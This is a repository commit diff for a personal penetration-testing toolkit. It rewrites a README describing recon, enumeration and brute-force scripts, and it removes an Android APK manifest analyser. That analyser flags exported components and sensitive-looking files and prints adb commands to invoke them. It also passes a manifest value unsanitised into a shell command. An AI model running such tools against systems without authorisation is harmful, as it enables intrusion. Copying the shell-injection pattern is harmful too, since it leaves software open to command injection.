Projects STRLCPY pentest-tools Commits 1932a194
🤬
Showing first 35 files as there are too many
  • ■ ■ ■ ■ ■ ■
    README.md
    1  -# pentest-tools
    2  -My collection of custom tools I use daily.
     1 +<h1 align="center">pentest-tools</h1>
    3 2   
    4  -I don't believe in licenses.
    5  -You can do whatever you want with this program.
     3 +<h4 align="center">A collection of custom security tools for quick needs.</h4>
    6 4   
    7  -However, there is a way to support :)
    8  -<a href="https://github.com/sponsors/gwen001" title="Sponsor gwen001"><img src="https://raw.githubusercontent.com/gwen001/pentest-tools/master/github-sponsor.jpg" alt="Sponsor gwen001" title="Sponsor gwen001"></a>
    9  - 
    10  - 
    11  -### arpa.sh
    12  -A script that will convert address in "arpa" format to classical format.
     5 +<p align="center">
     6 + <img src="https://img.shields.io/badge/-bash-gray" alt="bash badge">
     7 + <img src="https://img.shields.io/badge/python-v3-blue" alt="python badge">
     8 + <img src="https://img.shields.io/badge/php-%3E=5.5-blue" alt="php badge">
     9 + <img src="https://img.shields.io/badge/license-MIT-green" alt="MIT license badge">
     10 + <a href="https://twitter.com/intent/tweet?text=https%3a%2f%2fgithub.com%2fgwen001%2fpentest-tools%2f" target="_blank"><img src="https://img.shields.io/twitter/url?style=social&url=https%3A%2F%2Fgithub.com%2Fgwen001%2Fpentest-tools" alt="twitter badge"></a>
     11 +</p>
    13 12   
     13 +<!-- <p align="center">
     14 + <img src="https://img.shields.io/github/stars/gwen001/pentest-tools?style=social" alt="github stars badge">
     15 + <img src="https://img.shields.io/github/watchers/gwen001/pentest-tools?style=social" alt="github watchers badge">
     16 + <img src="https://img.shields.io/github/forks/gwen001/pentest-tools?style=social" alt="github forks badge">
     17 +</p> -->
    14 18   
    15  -### crtsh.php
    16  -A script that grab subdomains of a given domain from https://crt.sh
     19 +---
    17 20   
     21 +## arpa.sh
     22 +Converts IP address in `arpa` format to classical format.
     23 +```
     24 +182.218.193.78.in-addr.arpa domain name pointer fey75-1-78-193-218-182.fbxo.proxad.net. -> 78.193.218.182
     25 +```
     26 +## bbhost.sh
     27 +Performs `host` command on a given hosts list using `parallel` to make it fast.
    18 28   
    19  -### detect-vnc-rdp.sh
    20  -A script that test port of a given IP range with netcat, by default: 3389 and 5900.
     29 +## codeshare.php
     30 +Performs a string search on [codeshare.io](https://codeshare.io/).
    21 31   
     32 +## cors.py
     33 +Test CORS issue on a given list of hosts.
    22 34   
    23  -### dnsenum-brute.sh
    24  -A script that perform brute force through wordlist to find subdomains.
     35 +## crlf.py
     36 +Test CRLF issue on a given list of hosts.
    25 37   
     38 +## crtsh.php
     39 +Grabs subdomains of a given domain from https://crt.sh
    26 40   
    27  -### dnsenum-bruten.sh
    28  -A script that perform brute force through numeric variation to find subdomains.
     41 +## detect-vnc-rdp.sh
     42 +Tests if ports `3389` and `5900` are open on a given IP range using `netcat`.
    29 43   
     44 +## dnsenum-brute.sh
     45 +Performs brute force through wordlist to find subdomains.
    30 46   
    31  -### dnsenum-reverse.sh
    32  -A script that apply reverse DNS technic on a given IP range to find subdomains.
     47 +## dnsenum-bruten.sh
     48 +Performs brute force through numeric variation to find subdomains.
    33 49   
     50 +## dnsenum-reverse.sh
     51 +Apply reverse DNS method on a given IP range to find subdomains.
    34 52   
    35  -### dnsenum-reverserange.sh
     53 +## dnsenum-reverserange.sh
    36 54  Same thing but IP ranges are read from an input file.
    37 55   
     56 +## dnsenum-zonetransfer.sh
     57 +Tests Zone Transfer of a given domain.
    38 58   
    39  -### dnsenum-zonetransfer.sh
    40  -A script that test Zone Transfer of a given domain.
     59 +## dnsreq-alltypes.sh
     60 +Performs all types of DNS requests for a given (sub)domain.
    41 61   
     62 +## extract-domains.py
     63 +Extracts domain of a given URL or a list of URLs.
    42 64   
    43  -### extract-endpoints.php
    44  -A script that try to extract endpoints from Javascript files, thanks to [ZSeano](https://twitter.com/zseano)
     65 +## extract_links.php
     66 +Extracts links from a given HTML file.
    45 67   
     68 +## filterurls.py
     69 +Classifies and displays URLs by vulnerability types.
    46 70   
    47  -### extract_links.php
    48  -A script that try to extract links from a given HTML file.
     71 +## flash-regexp.sh
     72 +Performs regexps listed in `flash-regexp.txt` for Flash apps testing purpose.
    49 73   
     74 +## gdorks.php
     75 +Generates Google dorks for a given domain (searches are not performed).
    50 76   
    51  -### finddl.sh
    52  -???
     77 +## hashall.php
     78 +Uses about 40 algoritmes to hash a given string.
    53 79   
     80 +## ip-converter.php
     81 +Converts a given IP address to different format, see [Nicolas Grégoire presentation](https://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf).
    54 82   
    55  -### gdorks.php
    56  -A script that simply creates Google dorks for a given domain (the search are not performed).
    57 83   
    58 84   
    59  -### gg-extract-links.php
    60  -???
    61 85   
    62 86   
    63  -### ip-converter.php
    64  -A script that convert a given IP address to different format, thanks to [Nicolas Grégoire](http://www.agarri.fr/)
    65 87   
    66 88   
    67  -### ip-listing.php
     89 +## ip-listing.php
    68 90  A script that generates IP address from the start to the end.
    69 91   
    70 92   
    71  -### mass_axfr.sh
     93 +## mass_axfr.sh
    72 94  A script that test Zone Transfer on a given list of domains using [Fierce](https://github.com/mschwager/fierce).
    73 95   
    74 96   
    75  -### mass-smtp-user-enum-bruteforce.sh
     97 +## mass-smtp-user-enum-bruteforce.sh
    76 98  A script that perform SMTP user enumeration on a given list of IP address using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum)
    77 99   
    78 100   
    79  -### mass-smtp-user-enum-check.sh
     101 +## mass-smtp-user-enum-check.sh
    80 102  A script that simply test if SMTP user enumeration is possible on a given list of IP address using [smtp-user-enum](https://github.com/pentestmonkey/smtp-user-enum)
    81 103   
    82 104   
    83  -### nrpe.sh
     105 +## nrpe.sh
    84 106  A script that test the Nagios Remote Plugin Executor Arbitrary Command Execution using Metasploit.
    85 107   
    86 108   
    87  -### pass-permut.php
     109 +## pass-permut.php
    88 110  A script that creates words permutation with different separators and output the hashes.
    89 111   
    90 112   
    91  -### ping-sweep-nc.sh
     113 +## ping-sweep-nc.sh
    92 114  A script that try to determine what IP are alive in a given range of IP address using Netcat.
    93 115   
    94 116   
    95  -### ping-sweep-nmap.sh
     117 +## ping-sweep-nmap.sh
    96 118  A script that try to determine what IP are alive in a given range of IP address using Nmap.
    97 119   
    98 120   
    99  -### ping-sweep-ping.sh
     121 +## ping-sweep-ping.sh
    100 122  A script that try to determine what IP are alive in a given range of IP address using Ping.
    101 123   
    102 124   
    103  -### portscan-nc.sh
     125 +## portscan-nc.sh
    104 126  A script that try to determine the open ports of a given IP address using Netcat.
    105 127   
    106 128   
    107  -### screensite.sh
     129 +## screensite.sh
    108 130  A script that take a screenshot of a given url+port using Xvfb.
    109 131   
    110 132   
    111  -### srv_reco.sh
     133 +## srv_reco.sh
    112 134  A script that perform a very small test of a given IP address.
    113 135   
    114 136   
    115  -### ssh-timing-b4-pass.sh
     137 +## ssh-timing-b4-pass.sh
    116 138  ???
    117 139   
    118 140   
    119  -### ssrf-generate-ip.php
     141 +## ssrf-generate-ip.php
    120 142  A script that generate random IP address inside private network range.
    121 143   
    122 144   
    123  -### subdomains_finder.sh
     145 +## subdomains_finder.sh
    124 146  A script that find subdomains using other well known programs ([TheHarvester](https://github.com/laramies/theHarvester), [DNSrecon](https://github.com/darkoperator/dnsrecon)...)
    125 147   
    126 148   
    127  -### subthreat.php
     149 +## subthreat.php
    128 150  A script that grab subdomains of a given domain from https://www.threatcrowd.org
    129 151   
    130 152   
    131  -### testhttp.php
     153 +## testhttp.php
    132 154  A script that test if an url (subdomain+port) is a web thing.
    133 155   
    134 156   
    135  -### testhttp2.php
     157 +## testhttp2.php
    136 158  Same same but different.
    137 159   
    138 160   
    139  -### test-ip-wordlist.sh
     161 +## test-ip-wordlist.sh
    140 162  ???
    141 163   
    142 164   
    143  -### testnc.sh
     165 +## testnc.sh
    144 166  A script that fuzz a given IP address with Netcat.
    145 167   
    146 168   
    147  -### wayback-analyzer.php
     169 +## wayback-analyzer.php
    148 170  A script that try to nicely display [waybackurls.py](https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050) output.
    149 171   
    150 172   
    151  -### webdav-bruteforce.sh
     173 +## webdav-bruteforce.sh
    152 174  A script that perform brute force on a given url that use WebDav using [Davtest](https://github.com/cldrn/davtest)
    153 175   
  • ■ ■ ■ ■ ■ ■
    apk-analyzer.py
    1  -#!/usr/bin/python3
    2  - 
    3  -# I don't believe in license.
    4  -# You can do whatever you want with this program.
    5  - 
    6  -import argparse
    7  -import os
    8  -import subprocess
    9  -import sys
    10  -import xml.etree.ElementTree as ET
    11  - 
    12  -from colored import attr, bg, fg
    13  - 
    14  -t_templates = [
    15  - '_report.html',
    16  -]
    17  -t_templates_str = {}
    18  - 
    19  -############################### FUNCTIONS ###############################
    20  -def loadTemplates():
    21  - for tpl in t_templates:
    22  - t_templates_str[tpl] = 'aaa'
    23  - print(t_templates_str)
    24  - 
    25  -# loadTemplates()
    26  -# exit()
    27  - 
    28  - 
    29  -def format_bytes( size ):
    30  - units = ['b', 'kb', 'mb', 'gb', 'tb']
    31  - i = 0
    32  - while size>=1024 and i<4:
    33  - size = size / 1024
    34  - i = i + 1
    35  - return str(round(size,2)) + units[i]
    36  - 
    37  -def printH1( title ):
    38  - sys.stdout.write( '\n\n%s### %s ###%s\n\n' % (fg('light_cyan'),title,attr(0)) )
    39  - 
    40  -def printH2( title ):
    41  - sys.stdout.write( '\n%s# %s #%s\n\n' % (fg('light_blue'),title,attr(0)) )
    42  - 
    43  -def _print( txt, extra='', level='normal' ):
    44  - if not len(level):
    45  - level = 'normal'
    46  - t_colors = {
    47  - 'silent': 'grey_35',
    48  - 'hsilent': 'grey_35',
    49  - 'debug': 'light_magenta',
    50  - 'hdebug': 'magenta',
    51  - 'normal': 'white',
    52  - 'hnormal': 'light_gray',
    53  - 'info': 'light_green',
    54  - 'hinfo': 'green',
    55  - 'notice': 'gold_1',
    56  - 'hnotice': 'dark_orange_3a',
    57  - 'warning': 'light_red',
    58  - 'hwarning': 'red',
    59  - }
    60  - if len(txt):
    61  - sys.stdout.write( '%s%s' % (fg(t_colors[level]),txt) )
    62  - if len(extra):
    63  - # sys.stdout.write( ' [%s:%s]' % (level.replace('h',''),extra) )
    64  - sys.stdout.write( ' -- %s' % (extra) )
    65  - sys.stdout.write( '%s\n' % attr(0) )
    66  -############################### FUNCTIONS ###############################
    67  - 
    68  - 
    69  -############################### BASIC INFOS ###############################
    70  -def readInfos( grep_term ):
    71  - printH1( 'INFOS' )
    72  - 
    73  - _print( ('Package: %s' % root.attrib['package']) )
    74  - 
    75  - if 'platformBuildVersionCode' in root.attrib:
    76  - version = root.attrib['platformBuildVersionCode']
    77  - elif 'compileSdkVersion' in root.attrib:
    78  - version = root.attrib['compileSdkVersion']
    79  - else:
    80  - version = '?'
    81  - _print( ('Build: %s' % version) )
    82  - 
    83  - if not grep_term:
    84  - grep_term = root.attrib['package'].split('.')[1]
    85  - _print( ('Grep term: %s' % grep_term) )
    86  - # sys.stdout.write( '\n\n' )
    87  - 
    88  - return grep_term
    89  -############################### BASIC INFOS ###############################
    90  - 
    91  - 
    92  -############################### PERMISSIONS ###############################
    93  -def listPermissionsCreated():
    94  - t_term = []
    95  - t_noterm = []
    96  - t_all = root.findall('permission')
    97  - for obj in t_all:
    98  - if grep_term in obj.attrib['name']:
    99  - t_term.append( obj )
    100  - else:
    101  - t_noterm.append( obj )
    102  - 
    103  - printH2( 'PERMISSIONS CREATED (<permission>) (%d)' % len(t_all) )
    104  - printPermissionsCreated( t_term )
    105  - if len(t_term) and len(t_noterm):
    106  - sys.stdout.write( '---\n' )
    107  - printPermissionsCreated( t_noterm, 'h' )
    108  - 
    109  -def printPermissionsCreated( tab, plevel0='' ):
    110  - t_warning = {'EXTERNAL_STORAGE':'external storage permission','INTERNET':'webview permission'}
    111  - for obj in tab:
    112  - extra = ''
    113  - plevel = 'normal'
    114  - for k,v in t_warning.items():
    115  - if k in obj.attrib['name']:
    116  - extra = v
    117  - plevel = 'warning'
    118  - if not 'protectionLevel' in obj.attrib or obj.attrib['protectionLevel'] != 'signature':
    119  - extra = 'no signature'
    120  - plevel = 'warning'
    121  - _print( obj.attrib['name'], extra, plevel0+plevel )
    122  - 
    123  - 
    124  -def listPermissionsUsed():
    125  - t_term = []
    126  - t_noterm = []
    127  - t_all = root.findall('uses-permission')
    128  - for obj in t_all:
    129  - if grep_term in obj.attrib['name']:
    130  - t_term.append( obj )
    131  - else:
    132  - t_noterm.append( obj )
    133  - 
    134  - printH2( 'PERMISSIONS USED (<uses-permission>) (%d)' % len(t_all) )
    135  - printPermissionsUsed( t_term )
    136  - if len(t_term) and len(t_noterm):
    137  - sys.stdout.write( '---\n' )
    138  - printPermissionsUsed( t_noterm, 'h' )
    139  - 
    140  -def printPermissionsUsed( tab, plevel0='' ):
    141  - t_warning = {'EXTERNAL_STORAGE':'external storage permission','INTERNET':'webview permission'}
    142  - for obj in tab:
    143  - extra = ''
    144  - plevel = 'normal'
    145  - for k,v in t_warning.items():
    146  - if k in obj.attrib['name']:
    147  - extra = v
    148  - plevel = 'warning'
    149  - _print( obj.attrib['name'], extra, plevel0+plevel )
    150  - 
    151  - 
    152  -def listPermissionsRequired():
    153  - t_all = root.findall('permission')
    154  - t_term = []
    155  - t_noterm = []
    156  - for elem in root.iter():
    157  - if 'permission' in elem.attrib:
    158  - if grep_term in elem.attrib['permission']:
    159  - t_term.append( elem )
    160  - else:
    161  - t_noterm.append( elem )
    162  - 
    163  - printH2( 'PERMISSIONS REQUIRED (permission="") (%d)' % (len(t_term)+len(t_noterm)) )
    164  - printPermissionsRequired( t_all, t_term )
    165  - if len(t_term) and len(t_noterm):
    166  - sys.stdout.write( '---\n' )
    167  - printPermissionsRequired( t_all, t_noterm, 'h' )
    168  - 
    169  -def printPermissionsRequired( t_allperm, tab, plevel0='' ):
    170  - t_unwarn = ['android.permission','com.google.android','com.google.firebase']
    171  - for obj in tab:
    172  - extra = 'permission used but not created'
    173  - plevel = 'warning'
    174  - for perm in t_allperm:
    175  - if obj.attrib['permission'] == perm.attrib['name']:
    176  - extra = ''
    177  - plevel = 'normal'
    178  - for w in t_unwarn:
    179  - if w in obj.attrib['permission']:
    180  - extra = ''
    181  - plevel = 'normal'
    182  - _print( obj.attrib['permission'], extra, plevel0+plevel )
    183  - # sys.stdout.write( '%s%s %s%s\n' % (fg(color),obj.attrib['permission'],extra,attr(0)) )
    184  - 
    185  -def listPermissions():
    186  - printH1( 'PERMISSIONS' )
    187  - listPermissionsCreated()
    188  - listPermissionsUsed()
    189  - listPermissionsRequired()
    190  -############################### PERMISSIONS ###############################
    191  - 
    192  - 
    193  -############################### ACTIVITIES ###############################
    194  -def listActivities():
    195  - app = root.find( 'application' )
    196  - t_all = app.findall('activity')
    197  - t_all = t_all + app.findall('activity-alias')
    198  - t_term = []
    199  - t_noterm = []
    200  - for obj in t_all:
    201  - if grep_term in obj.attrib['name']:
    202  - t_term.append( obj )
    203  - else:
    204  - t_noterm.append( obj )
    205  - printH1( 'ACTIVITIES (%d)' % len(t_all) )
    206  - printActivities( t_term )
    207  - if len(t_term) and len(t_noterm):
    208  - sys.stdout.write( '---\n' )
    209  - printActivities( t_noterm, 'h' )
    210  - 
    211  -def printActivities( tab, plevel0='' ):
    212  - for obj in tab:
    213  - if 'exported' in obj.attrib:
    214  - extra = 'exported param'
    215  - exported = obj.attrib['exported'].lower()
    216  - elif obj.findall('intent-filter'):
    217  - extra = 'intent-filter'
    218  - exported = 'true'
    219  - else:
    220  - exported = 'false'
    221  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    222  - exported = 'false'
    223  - if exported == 'false':
    224  - extra = ''
    225  - plevel = 'normal'
    226  - else:
    227  - extra = "activity is exported ("+extra+") and no '" + grep_term + "' permission setted"
    228  - plevel = 'warning'
    229  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    230  - extra = extra + " but is disabled"
    231  - plevel = 'notice'
    232  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    233  - for k,v in sorted(obj.attrib.items()):
    234  - k = k.replace('','')
    235  - if not k == 'name':
    236  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    237  - if display_commands:
    238  - # t_actions = ['android.intent.action.VIEW']
    239  - # if obj.findall('intent-filter'):
    240  - # for intentfilter in obj.findall('intent-filter'):
    241  - # if intentfilter.findall('action'):
    242  - # for action in intentfilter.findall('action'):
    243  - # if not action.attrib['name'] in t_actions:
    244  - # t_actions.append( action.attrib['name'] )
    245  - # for action in t_actions:
    246  - # _print( ' adb shell am start -S -a '+action+' -n '+root.attrib['package']+'/'+obj.attrib['name'] ,'', 'silent' )
    247  - _print( ' adb shell am start -S -n '+root.attrib['package']+'/'+obj.attrib['name'], '', 'silent' )
    248  -############################### ACTIVITIES ###############################
    249  - 
    250  - 
    251  -############################### SERVICES ###############################
    252  -def listServices():
    253  - app = root.find( 'application' )
    254  - t_all = app.findall('service')
    255  - t_term = []
    256  - t_noterm = []
    257  - for obj in t_all:
    258  - if grep_term in obj.attrib['name']:
    259  - t_term.append( obj )
    260  - else:
    261  - t_noterm.append( obj )
    262  - printH1( 'SERVICES (%d)' % len(t_all) )
    263  - printServices( t_term )
    264  - if len(t_term) and len(t_noterm):
    265  - sys.stdout.write( '---\n' )
    266  - printServices( t_noterm, 'h' )
    267  - 
    268  - 
    269  -def printServices( tab, plevel0='' ):
    270  - for obj in tab:
    271  - if 'exported' in obj.attrib:
    272  - extra = 'exported param'
    273  - exported = obj.attrib['exported'].lower()
    274  - elif obj.findall('intent-filter'):
    275  - extra = 'intent-filter'
    276  - exported = 'true'
    277  - else:
    278  - exported = 'false'
    279  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    280  - exported = 'false'
    281  - if exported == 'false':
    282  - extra = ''
    283  - plevel = 'normal'
    284  - else:
    285  - extra = "service is exported ("+extra+") and no '" + grep_term + "' permission setted"
    286  - plevel = 'warning'
    287  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    288  - extra = extra + " but is disabled"
    289  - plevel = 'notice'
    290  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    291  - for k,v in sorted(obj.attrib.items()):
    292  - k = k.replace('','')
    293  - if not k == 'name':
    294  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    295  - if display_commands:
    296  - _print( ' adb shell am startservice -n '+root.attrib['package']+'/'+obj.attrib['name'],'', 'silent' )
    297  -############################### SERVICES ###############################
    298  - 
    299  - 
    300  -############################### RECEIVERS ###############################
    301  -def listReceivers():
    302  - app = root.find( 'application' )
    303  - t_all = app.findall('receiver')
    304  - t_term = []
    305  - t_noterm = []
    306  - for obj in t_all:
    307  - if grep_term in obj.attrib['name']:
    308  - t_term.append( obj )
    309  - else:
    310  - t_noterm.append( obj )
    311  - printH1( 'RECEIVERS (%d)' % len(t_all) )
    312  - printReceivers( t_term )
    313  - if len(t_term) and len(t_noterm):
    314  - sys.stdout.write( '---\n' )
    315  - printReceivers( t_noterm, 'h' )
    316  - 
    317  - 
    318  -def printReceivers( tab, plevel0='' ):
    319  - for obj in tab:
    320  - if 'exported' in obj.attrib:
    321  - extra = 'exported param'
    322  - exported = obj.attrib['exported'].lower()
    323  - elif obj.findall('intent-filter'):
    324  - extra = 'intent-filter'
    325  - exported = 'true'
    326  - else:
    327  - exported = 'false'
    328  - if 'permission' in obj.attrib and grep_term in obj.attrib['permission']:
    329  - exported = 'false'
    330  - if exported == 'false':
    331  - extra = ''
    332  - plevel = 'normal'
    333  - else:
    334  - extra = "receiver is exported ("+extra+") and no '" + grep_term + "' permission setted"
    335  - plevel = 'warning'
    336  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    337  - extra = extra + " but is disabled"
    338  - plevel = 'notice'
    339  - _print( '[+] '+obj.attrib['name'] ,extra, plevel0+plevel )
    340  - for k,v in sorted(obj.attrib.items()):
    341  - k = k.replace('','')
    342  - if not k == 'name':
    343  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    344  - if display_commands:
    345  - # t_actions = ['android.intent.action.VIEW']
    346  - # if obj.findall('intent-filter'):
    347  - # for intentfilter in obj.findall('intent-filter'):
    348  - # if intentfilter.findall('action'):
    349  - # for action in intentfilter.findall('action'):
    350  - # if not action.attrib['name'] in t_actions:
    351  - # t_actions.append( action.attrib['name'] )
    352  - # for action in t_actions:
    353  - # _print( ' adb shell am start -S -a '+action+' -n '+root.attrib['package']+'/'+obj.attrib['name'] ,'', 'silent' )
    354  - _print( ' adb shell am broadcast -n '+root.attrib['package']+'/'+obj.attrib['name'], '', 'silent' )
    355  -############################### RECEIVERS ###############################
    356  - 
    357  - 
    358  -############################### PROVIDERS ###############################
    359  -def listProviders():
    360  - app = root.find( 'application' )
    361  - t_all = app.findall('provider')
    362  - t_term = []
    363  - t_noterm = []
    364  - t_providers_uri = {}
    365  - for obj in t_all:
    366  - if obj.attrib['authorities'].startswith('@'):
    367  - continue
    368  - if grep_term in obj.attrib['authorities']:
    369  - t_term.append( obj )
    370  - else:
    371  - t_noterm.append( obj )
    372  - t_providers_uri[ obj.attrib['authorities'] ] = getProviderURI( obj.attrib['authorities'] )
    373  - printH1( 'PROVIDERS (%d)' % len(t_all) )
    374  - printProviders( t_term, t_providers_uri )
    375  - if len(t_term) and len(t_noterm):
    376  - sys.stdout.write( '---\n' )
    377  - printProviders( t_noterm, t_providers_uri, 'h' )
    378  - 
    379  -def getProviderURI( authority ):
    380  - t_uri = [ 'content://'+authority ]
    381  - # t_uri = [ 'content://'+authority ]
    382  - cmd = 'egrep -hro "content://'+ authority + '[a-zA-Z0-9_-/\.]+" "' + src_directory + '/smali/" 2>/dev/null'
    383  - # print(cmd)
    384  - try:
    385  - output = subprocess.check_output( cmd, shell=True ).decode('utf-8')
    386  - # print(output)
    387  - except Exception as e:
    388  - # sys.stdout.write( "%s[-] error occurred: %s%s\n" % (fg('red'),e,attr(0)) )
    389  - return t_uri
    390  - 
    391  - for l in output.split("\n"):
    392  - if not len(l):
    393  - continue
    394  - tiktok = ''
    395  - l = l.strip().strip('/').replace( 'content://','' )
    396  - t_split = l.split('/')
    397  - for token in t_split:
    398  - tiktok = tiktok + '/' + token
    399  - tiktok = tiktok.strip('/')
    400  - uri1 = 'content://' + tiktok
    401  - if not uri1 in t_uri:
    402  - t_uri.append( uri1 )
    403  - # uri2 = 'content://' + tiktok + '/'
    404  - # if not uri2 in t_uri:
    405  - # t_uri.append( uri2 )
    406  - 
    407  - return t_uri
    408  - 
    409  - 
    410  -def printProviders( tab, t_providers_uri, plevel0='' ):
    411  - for obj in tab:
    412  - if 'exported' in obj.attrib:
    413  - extra = 'exported param'
    414  - exported = obj.attrib['exported'].lower()
    415  - elif obj.findall('intent-filter'):
    416  - extra = 'intent-filter'
    417  - exported = 'true'
    418  - else:
    419  - exported = 'false'
    420  - if ('permission' in obj.attrib and grep_term in obj.attrib['permission']) or ('readPermission' in obj.attrib and grep_term in obj.attrib['readPermission']):
    421  - exported = 'false'
    422  - if exported == 'false':
    423  - extra = ''
    424  - plevel = 'normal'
    425  - else:
    426  - extra = "provider is exported ("+extra+") and no '" + grep_term + "' permission setted"
    427  - plevel = 'warning'
    428  - if 'enabled' in obj.attrib and obj.attrib['enabled'].lower() == 'false':
    429  - extra = extra + " but is disabled"
    430  - plevel = 'notice'
    431  - _print( '[+] '+obj.attrib['authorities'] ,extra, plevel0+plevel )
    432  - for k,v in sorted(obj.attrib.items()):
    433  - k = k.replace('','')
    434  - if not k == 'name':
    435  - _print( ' %s: %s' % (k,v) ,'', plevel0+plevel )
    436  - if obj.attrib['authorities'] in t_providers_uri and len(t_providers_uri[obj.attrib['authorities']]):
    437  - if len(obj.attrib)>1:
    438  - _print( ' ---', '', plevel0+plevel )
    439  - for uri in sorted(t_providers_uri[obj.attrib['authorities']]):
    440  - _print( ' %s' % uri, '', plevel0+plevel )
    441  - if display_commands:
    442  - _print( ' adb shell content query --uri '+uri, '', 'silent' )
    443  -############################### PROVIDERS ###############################
    444  - 
    445  - 
    446  -############################### INTERESTING FILES ###############################
    447  -t_files_warning = ['conf','secret','pass','key','auth','cer','crt']
    448  -t_files_ignore = ['.shader','.dict','abp.txt','crashlytics-build.properties','tzdb.dat','.snsr','.alyp','.alyg','.frag','.vert','.gmt','.kml','.traineddata','.glsl','.glb','.css','.otf','.aac','.mid','.ogg','.m4a','.m4v','.ico','.gif','.jpg','.jpeg','.png','.bmp','.svg','.avi','.mpg','.mpeg','.mp3','.woff','.woff2','.ttf','.eot','.mp3','.mp4','.wav','.mpg','.mpeg','.avi','.mov','.wmv' ]
    449  - 
    450  -def _listFiles( dir ):
    451  - t_all = []
    452  - t_files = []
    453  - 
    454  - # r=root, d=directories, f=files
    455  - for r, d, f in os.walk( dir ):
    456  - for file in f:
    457  - filepath = os.path.join(r,file)
    458  - # filename = filepath.replace(src_directory+'/','')
    459  - filename = filepath.replace(' ','\ ')
    460  - filesstats = os.stat( filepath )
    461  - filesize = format_bytes( filesstats.st_size )
    462  - t_all.append( {'filename':filename,'filesize':filesize} )
    463  - if not filesstats.st_size:
    464  - ignore = True
    465  - else:
    466  - ignore = False
    467  - for i in t_files_ignore:
    468  - if i in filename.lower():
    469  - ignore = True
    470  - if not ignore:
    471  - t_files.append( {'filename':filename,'filesize':filesize} )
    472  - 
    473  - return t_all,t_files
    474  - 
    475  - 
    476  -def printFiles( t_files ):
    477  - for file in sorted(t_files,key=lambda k:k['filename']):
    478  - extra = ''
    479  - plevel = 'normal'
    480  - for w in t_files_warning:
    481  - if w in file['filename'].lower():
    482  - extra = 'can be a sensitive file (\'' + w + '\' found in filemane)'
    483  - plevel = 'warning'
    484  - # sys.stdout.write( '%s%s (%s) %s%s\n' % (fg(color),file['filename'],file['filesize'],extra,attr(0)) )
    485  - _print( '%s (%s)' % (file['filename'],file['filesize']), extra, plevel )
    486  - 
    487  - 
    488  -def listFiles():
    489  - printH1( 'FILES' )
    490  - t_all, t_files = _listFiles( src_directory+'/assets/' )
    491  - printH2( 'ASSETS (%d/%d)' % (len(t_files),len(t_all)) )
    492  - printFiles( t_files )
    493  - t_all, t_files = _listFiles( src_directory+'/res/raw/' )
    494  - printH2( 'RES/RAW (%d/%d)' % (len(t_files),len(t_all)) )
    495  - printFiles( t_files )
    496  -############################### INTERESTING FILES ###############################
    497  - 
    498  - 
    499  -############################### DEEP LINKS ###############################
    500  -def listDeepLinks():
    501  - app = root.find( 'application' )
    502  - t_items = app.findall('activity')
    503  - t_items = t_items + app.findall('service')
    504  - t_deeplinks = []
    505  - for activity in t_items:
    506  - t_filters = activity.findall('intent-filter')
    507  - if not t_filters:
    508  - pass
    509  - for filter in t_filters:
    510  - t_tmpdl = []
    511  - has_action = False
    512  - has_category = False
    513  - for child in filter:
    514  - if child.tag == 'action' and child.attrib['name'] == 'android.intent.action.VIEW':
    515  - has_action = True
    516  - if child.tag == 'category' and child.attrib['name'] == 'android.intent.category.BROWSABLE':
    517  - has_category = True
    518  - if child.tag == 'data': # and 'scheme' in child.attrib:
    519  - t_tmpdl.append( child )
    520  - # if has_action and has_category:
    521  - t_deeplinks.extend( t_tmpdl )
    522  - 
    523  - printH1( 'DEEP LINKS (%d)' % (len(t_deeplinks)) )
    524  - 
    525  - for deeplink in t_deeplinks:
    526  - sys.stdout.write( '<data ' )
    527  - for k,v in deeplink.items():
    528  - # sys.stdout.write( 'android:%s="%s" ' % (k,v) )
    529  - sys.stdout.write( '%s="%s" ' % (k,v) )
    530  - sys.stdout.write( '/>\n' )
    531  -############################### DEEP LINKS ###############################
    532  - 
    533  - 
    534  -parser = argparse.ArgumentParser()
    535  -parser.add_argument( "-d","--directory",help="source directory" )
    536  -parser.add_argument( "-t","--term",help="term referencing the editor" )
    537  -parser.add_argument( "-c","--command",help="display commands to run", action="store_true" )
    538  -parser.add_argument( "-m","--mod",help="mod to run" )
    539  -parser.parse_args()
    540  -args = parser.parse_args()
    541  - 
    542  -if args.term:
    543  - grep_term = args.term
    544  -else:
    545  - grep_term = ''
    546  - 
    547  -if args.mod:
    548  - mod = args.mod
    549  -else:
    550  - mod = 'paroslf'
    551  - 
    552  -if args.command:
    553  - display_commands = True
    554  -else:
    555  - display_commands = False
    556  - 
    557  -if not args.directory:
    558  - parser.error( 'source directory is missing' )
    559  - 
    560  -args.directory = args.directory.rstrip('/')
    561  -src_directory = args.directory
    562  -if not os.path.isdir(src_directory):
    563  - parser.error( 'source directory not found' )
    564  - 
    565  -src_manifest = src_directory + '/' + 'AndroidManifest.xml'
    566  -if not os.path.isfile(src_manifest):
    567  - parser.error( 'Manifest file not found' )
    568  - 
    569  -try:
    570  - etparse = ET.parse( src_manifest )
    571  -except:
    572  - parser.error( 'Cannot read Manifest' )
    573  - 
    574  -root = etparse.getroot()
    575  -if not root:
    576  - parser.error( 'Cannot read Manifest' )
    577  - 
    578  -for elem in root.iter():
    579  - # print( elem.attrib )
    580  - elem.attrib = { k.replace('{http://schemas.android.com/apk/res/android}', ''): v for k, v in elem.attrib.items() }
    581  - # print( elem.attrib )
    582  - 
    583  -grep_term = readInfos( grep_term )
    584  - 
    585  -for m in mod:
    586  - if m == 'p':
    587  - listPermissions()
    588  - elif m == 'f':
    589  - listFiles()
    590  - # listAssets()
    591  - # listRaw()
    592  - elif m == 'a':
    593  - listActivities()
    594  - elif m == 'r':
    595  - listReceivers()
    596  - elif m == 'o':
    597  - listProviders()
    598  - elif m == 's':
    599  - listServices()
    600  - elif m == 'l':
    601  - listDeepLinks()
    602  - 
  • ■ ■ ■ ■ ■ ■
    apk-downloader.py
